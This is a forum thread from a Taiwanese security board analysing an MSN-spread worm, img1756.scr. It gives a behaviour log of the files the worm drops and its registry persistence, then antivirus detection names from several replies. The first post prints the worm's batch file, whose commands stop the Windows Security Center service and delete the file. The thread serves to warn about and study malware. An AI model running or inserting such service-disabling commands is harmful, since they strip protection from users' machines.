【木馬】2007-08-08MSN傳來img1756.zip

第 1 頁,共 2 頁 1 2 末頁末頁
顯示結果從第 1 筆 到 10 筆,共計 16 筆
  1. #1
    會員
    註冊日期
    2007-03-22
    所在地區
    CABLE
    討論區文章
    94

    【木馬】2007-08-08MSN傳來img1756.zip

    運行img1756.scr,發現下列行為,被EQ-Secure V3.4攔截!
    2007-08-08 08:48:45 運行應用程序 操作:允許
    進程路徑:D:\desktop\virus\img1756\img1756.scr
    文件路徑:D:\desktop\virus\img1756\img1756.scr
    命令行:/S
    觸發規則:所有程序規則->*


    2007-08-08 08:48:46 修改其它進程內存 操作:允許
    進程路徑:D:\desktop\virus\img1756\img1756.scr
    目標進程:D:\desktop\virus\img1756\img1756.scr
    觸發規則:所有程序規則->*

    2007-08-08 08:48:54 創建文件 操作:允許
    進程路徑:D:\desktop\virus\img1756\img1756.scr
    文件路徑:C:\a.bat
    觸發規則:所有程序規則->全局設置_可執行文件1_普通模式->%SystemDrive%\*.bat


    2007-08-08 08:48:54 運行應用程序 操作:阻止
    進程路徑:D:\desktop\virus\img1756\img1756.scr
    文件路徑:C:\windows\system32\cmd.exe
    命令行:/c ""c:\a.bat" "
    觸發規則:所有程序規則->系統程序->%windir%\system32\cmd.exe


    2007-08-08 08:48:55 創建文件 操作:允許
    進程路徑:D:\desktop\virus\img1756\img1756.scr
    文件路徑:C:\windows\img1756.zip
    觸發規則:所有程序規則->全局設置_普通模式->%SystemDrive%\*


    2007-08-08 08:48:57 創建文件 操作:允許
    進程路徑:D:\desktop\virus\img1756\img1756.scr
    文件路徑:C:\windows\svchost.exe
    觸發規則:所有程序規則->全局設置_可執行文件1_普通模式->%SystemDrive%\*.exe


    2007-08-08 08:48:57 創建注冊表值 操作:阻止
    進程路徑:D:\desktop\virus\img1756\img1756.scr
    注冊表路徑:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    注冊表名稱:Microsoft Genuine Logon
    注冊表數據:svchost.exe
    觸發規則:所有程序規則->自動運行_普通模式->*\SOFTWARE\Microsoft\Windows\CurrentVersion\Run*


    2007-08-08 08:48:58 運行應用程序 操作:允許
    進程路徑:D:\desktop\virus\img1756\img1756.scr
    文件路徑:C:\windows\svchost.exe
    觸發規則:所有程序規則->*


    2007-08-08 08:49:00 運行應用程序 操作:允許
    進程路徑:C:\windows\svchost.exe
    文件路徑:C:\windows\svchost.exe
    觸發規則:所有程序規則->*


    2007-08-08 08:49:02 修改其它進程內存 操作:允許
    進程路徑:C:\windows\svchost.exe
    目標進程:C:\windows\svchost.exe
    觸發規則:所有程序規則->*

    2007-08-08 08:49:13 修改文件 操作:阻止
    進程路徑:C:\windows\svchost.exe
    文件路徑:C:\a.bat
    觸發規則:所有程序規則->全局設置_可執行文件1_普通模式->%SystemDrive%\*.bat


    2007-08-08 08:49:13 運行應用程序 操作:阻止
    進程路徑:C:\windows\svchost.exe
    文件路徑:C:\windows\system32\cmd.exe
    命令行:/c ""c:\a.bat" "
    觸發規則:所有程序規則->系統程序->%windir%\system32\cmd.exe


    2007-08-08 08:49:13 修改文件 操作:阻止
    進程路徑:C:\windows\svchost.exe
    文件路徑:C:\windows\img1756.zip
    觸發規則:所有程序規則->全局設置_普通模式->%SystemDrive%\*


    2007-08-08 08:49:34 運行應用程序 操作:阻止
    進程路徑:C:\windows\system32\svchost.exe
    文件路徑:C:\Program Files\MSN Messenger\msnmsgr.exe
    命令行:-Embedding
    觸發規則:所有程序規則->*
    1.它會運行自己
    命令行:/S
    2.它會修改自己的進程內存
    3.它會生成
    C:\a.bat
    4.它會運行C:\windows\system32\cmd.exe
    命令行:/c ""c:\a.bat" "
    5.它會生成
    C:\windows\img1756.zip
    C:\windows\svchost.exe
    6.它會創建注冊表值
    注冊表路徑:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    注冊表名稱:Microsoft Genuine Logon
    注冊表數據:svchost.exe
    7.它會運行C:\windows\svchost.exe
    8.svchost.exe會運行自己
    9.svchost.exe會修改自己的進程內存
    10.svchost.exe會修改C:\a.bat
    11.svchost.exe會運行C:\windows\system32\cmd.exe
    命令行:/c ""c:\a.bat" "
    12.svchost.exe會修改C:\windows\img1756.zip
    13.正牌的svchost.exe會運行C:\Program Files\MSN Messenger\msnmsgr.exe
    命令行:-Embedding

    a.bat的結構
    @echo off
    net stop "Security Center"
    net stop winvnc4
    del c:\a.bat


    附加檔案 附加檔案

  2. #2
    會員
    註冊日期
    2006-11-29
    所在地區
    FTTB 10M/2M
    討論區文章
    99

    回覆: 【木馬】2007-08-08MSN傳來img1756.zip


  3. #3
    谷樂@GoKo團長
    註冊日期
    2006-07-28
    所在地區
    CABLE
    討論區文章
    121

    回覆: 【木馬】2007-08-08MSN傳來img1756.zip

    不禁是1756
    目前叫images.zip也有
    剛剛朋友send給我, 不過我早知道這肯定是病毒而已
    這次看來一次性爆發?

  4. #4
    谷樂@GoKo團長
    註冊日期
    2006-07-28
    所在地區
    CABLE
    討論區文章
    121

    回覆: 【木馬】2007-08-08MSN傳來img1756.zip

    剛剛用KIS

    Kaspersky Internet Security 6.0

    The requested URL http://www.pczone.com.tw/attachments...254.attachment is infected with Backdoor.Win32.SdBot.aad virus


    真好用

  5. #5
    會員
    註冊日期
    2006-10-02
    所在地區
    ADSL 2M/256
    討論區文章
    45

    回覆: 【木馬】2007-08-08MSN傳來img1756.zip

    Norton AntiVirus 2005 查的結果 ! 病毒碼 2007.8.07

    檔案 img1756.scr 位於 C:\WINDOWS\Desktop\可疑危險程式區\img1756.zip 感染了 W32.Scrimge.A 病毒。




  6. #6
    地平線的那端 DarkSkyline 的大頭照
    註冊日期
    2001-05-09
    所在地區
    Hinet 4M/1M
    討論區文章
    554

    回覆: 【木馬】2007-08-08MSN傳來img1756.zip

    AntiVir PersonalEdition Classic 發現"WORM/sdbot.4984.42"病毒~

  7. #7
    會員
    註冊日期
    2005-02-13
    討論區文章
    34

    回覆: 【木馬】2007-08-08MSN傳來img1756.zip

    NOD32 2450有抓到
    附加圖片 附加圖片 01.jpg  

  8. #8
    會員
    註冊日期
    2005-10-14
    所在地區
    HiNet VDSL 50M/5M
    討論區文章
    37

    回覆: 【木馬】2007-08-08MSN傳來img1756.zip

    還沒下載KIS6.0就發現病毒了^^
    檔案 包含 特洛伊木馬程式 「Backdoor.Win32.SdBot.aad」。建議
    您終止下載。

  9. #9
    會員
    註冊日期
    2006-01-27
    討論區文章
    54

    回覆: 【木馬】2007-08-08MSN傳來img1756.zip

    朋友只有給我訊息而已

    都沒給我病毒本體 囧..

  10. #10
    Bad Boy proll 的大頭照
    註冊日期
    2005-07-20
    討論區文章
    1,039

    回覆: 【木馬】2007-08-08MSN傳來img1756.zip

    f-prot
    [Found security risk] <W32/Tibs.WN (exact)> \img1756\img1756.scr

    panda掛



類似的主題

  1. 【病毒】樣本 img5-2007.zip
    作者:arlona 所在討論版:-- 防 駭 / 防 毒 版
    回覆: 2
    最後發表: 2008-01-25, 11:06 PM
  2. 【木馬】MSN 木馬 (Image063.zip)
    作者:Roger 所在討論版:-- 防 駭 / 防 毒 版
    回覆: 0
    最後發表: 2008-01-08, 06:39 PM
  3. 【木馬】8月底朋友傳來的MSN病毒~img334.zip
    作者:bossray7 所在討論版:-- 防 駭 / 防 毒 版
    回覆: 5
    最後發表: 2007-10-14, 02:28 PM
  4. 【木馬】2007-09-08 惡意連結幾個
    作者:天氣預報 所在討論版:-- 防 駭 / 防 毒 版
    回覆: 2
    最後發表: 2007-09-12, 10:30 PM

 

此網頁沒有從搜尋引擎而來的訪客

發表文章規則

  • 不可以發表新主題
  • 不可以回覆文章
  • 不可以上傳附加檔案
  • 不可以編輯自己的文章
  •